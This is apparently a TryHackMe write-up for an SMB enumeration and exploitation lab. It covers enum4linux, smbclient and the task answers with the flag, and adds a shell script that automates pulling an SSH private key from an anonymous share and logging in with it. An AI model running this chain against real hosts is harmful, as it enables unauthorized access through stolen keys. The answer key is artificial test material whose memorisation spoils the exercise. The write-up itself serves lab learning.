Network Services
Enumerate and exploit a variety of network services and misconfigurations...
SMB
This stands for Server Message Block. SMB is a client-server protocol for sharing access to files, printers and other resources over a network. Windows supports it natively; Unix-like systems provide it through Samba.
It is a request-response protocol: the client and server exchange several messages to negotiate a protocol dialect and set up a session before any file operation takes place. Clients generally connect over TCP/IP, directly on port 445 or on port 139 via NetBIOS.
Once a session is established, the client sends commands (SMB messages) to the server to open, read and write files and other shared resources as if they were local, but over the network.
Enumeration
Enumeration is the process of gathering information about a target to find potential attack vectors. It is essential to a successful attack because it yields information valuable to an attacker, such as usernames, passwords, hostnames and application data.
A server typically exposes SMB shares that clients can connect to and browse, and these shares sometimes contain valuable, sensitive information.
The first step of enumeration is a port scan (Nmap was covered earlier). Enum4Linux is a tool that enumerates SMB on both Windows and Linux targets and makes it quick to extract the SMB-related information listed below.
The syntax is very easy: enum4linux [options] ip
-U    Get user list
-M    Get machine list
-N    Get name list dump
-S    Get share list
-P    Get password policy information
-G    Get the group and member list
-a    Do all of the above (a full enumeration)
Exploitation
Once you have run the enumeration above, you know the name and location of an SMB share. We use smbclient to access it remotely; the general form is smbclient //[IP]/[share], and options go after the share name separated by spaces, such as -U to specify a user and -p to specify a port.
Extra Explanation
This part is aimed at helping you solve Task 4, because the smb: prompt is not a bash shell and its syntax is very different.
We are interested in the file Working From Home Information.txt. cat is not an smbclient command, so it does nothing useful, and open or open <file> does not display the file either. smbclient has its own command set (ls, cd, get, mget, more and so on): use get to download the file, or more to page through it without saving it, and quote the name because it contains spaces, e.g. get "Working From Home Information.txt".
Once you have read it, you will see it is a letter to John Cactus, so we assume the profile belongs to him. Use cd to move into the .ssh directory and ls to list the files there. Then download id_rsa with smbclient's get command (get id_rsa); it is written to the directory smbclient was started from.
Back on your machine, open id_rsa and you will see it is an SSH private key. First restrict its permissions with chmod 600 id_rsa, because ssh refuses to use a key that other users can read. Then ssh into the server with the key: ssh -i id_rsa <user>@<target ip>.
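The chain above (connect to the share, pull id_rsa out of .ssh, fix its permissions, log in) done non-interactively, as an added example that is not part of the TryHackMe room or the original write-up. The target IP, share name, login user and key path are assumptions of mine and can be overridden in the environment; DRY_RUN=1 prints the network commands instead of running them so the script can be exercised without a target.

```shell
#!/bin/sh
# Added example for this write-up; it is not part of the TryHackMe room.
# It runs the whole chain non-interactively: pull id_rsa out of the share's
# .ssh directory using smbclient's own command language, fix the key's
# permissions, then log in with it.
# Assumed values (mine, not the page's): TARGET, SHARE, LOGIN_USER and KEY.
# Override them in the environment. DRY_RUN=1 prints the network commands
# instead of running them, so the script can be exercised without a target.
set -u

TARGET=${TARGET:-10.10.10.2}
SHARE=${SHARE:-profiles}
LOGIN_USER=${LOGIN_USER:-cactus}   # assumed; the share itself does not name the login
KEY=${KEY:-./id_rsa}

# Run a command, or print it when DRY_RUN=1.
run() {
    if [ "${DRY_RUN:-0}" = "1" ]; then
        printf '%s\n' "$*"
    else
        "$@"
    fi
}

# Quick enumeration: everything enum4linux knows, plus the share list over
# a null session (-N), which is what an anonymously readable share allows.
enumerate() {
    run enum4linux -a "$TARGET"
    run smbclient -L "//$TARGET" -N
}

# Fetch the key. -c hands smbclient its own commands (cd, get); there is
# no cat at the smb: prompt, which is why it "doesn't work" interactively.
fetch_key() {
    run smbclient "//$TARGET/$SHARE" -N -c "cd .ssh; get id_rsa $KEY"
}

# Check what came back and make ssh accept it: the file must look like a
# private key, and ssh refuses a key that anyone but the owner can read.
# Returns 0 on success, 1 if the file is missing, 2 if it is not a key.
prepare_key() {
    key=$1
    [ -f "$key" ] || { echo "no key file: $key" >&2; return 1; }
    if ! head -n 1 "$key" | grep -q -e '^-----BEGIN .*PRIVATE KEY-----$'; then
        echo "not a private key: $key" >&2
        return 2
    fi
    chmod 600 "$key"
}

# IdentitiesOnly stops ssh from offering every agent key before this one.
login() {
    run ssh -i "$KEY" -o IdentitiesOnly=yes "$LOGIN_USER@$TARGET"
}

# Only run the chain when explicitly asked, so the functions can be sourced.
case "${1:-}" in
    --enum) enumerate ;;
    --run)  fetch_key && prepare_key "$KEY" && login ;;
esac
```

Run it with --enum first to list shares, then --run once you know the share is readable anonymously. If the share needs credentials, replace -N with -U <user> in fetch_key; smbclient will prompt for the password.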
Answers
Task 2
What does SMB stand for? Server Message Block
What type of protocol is SMB? response-request
What do clients connect to servers using? TCP/IP
What systems does Samba run on? Unix
Task 3
Conduct an nmap scan of your choosing. How many ports are open? 3
What ports is SMB running on? 139/445
For starters, what is the workgroup name? WORKGROUP
What comes up as the name of the machine? POLOSMB
What operating system version is running? 6.1
What share sticks out as something we might want to investigate? profiles
Task 4
What would be the correct syntax to access an SMB share called “secret” as user “suit” on a machine with the IP 10.10.10.2 on the default port? smbclient //10.10.10.2/secret -U suit -p 445
Does the share allow anonymous access? Y/N? Y
Who can we assume this profile folder belongs to? John Cactus
What service has been configured to allow him to work from home? ssh
Okay! Now we know this, what directory on the share should we look in? .ssh
Which of these keys is most useful to us? id_rsa
What is the smb.txt flag? THM{smb_is_fun_eh?}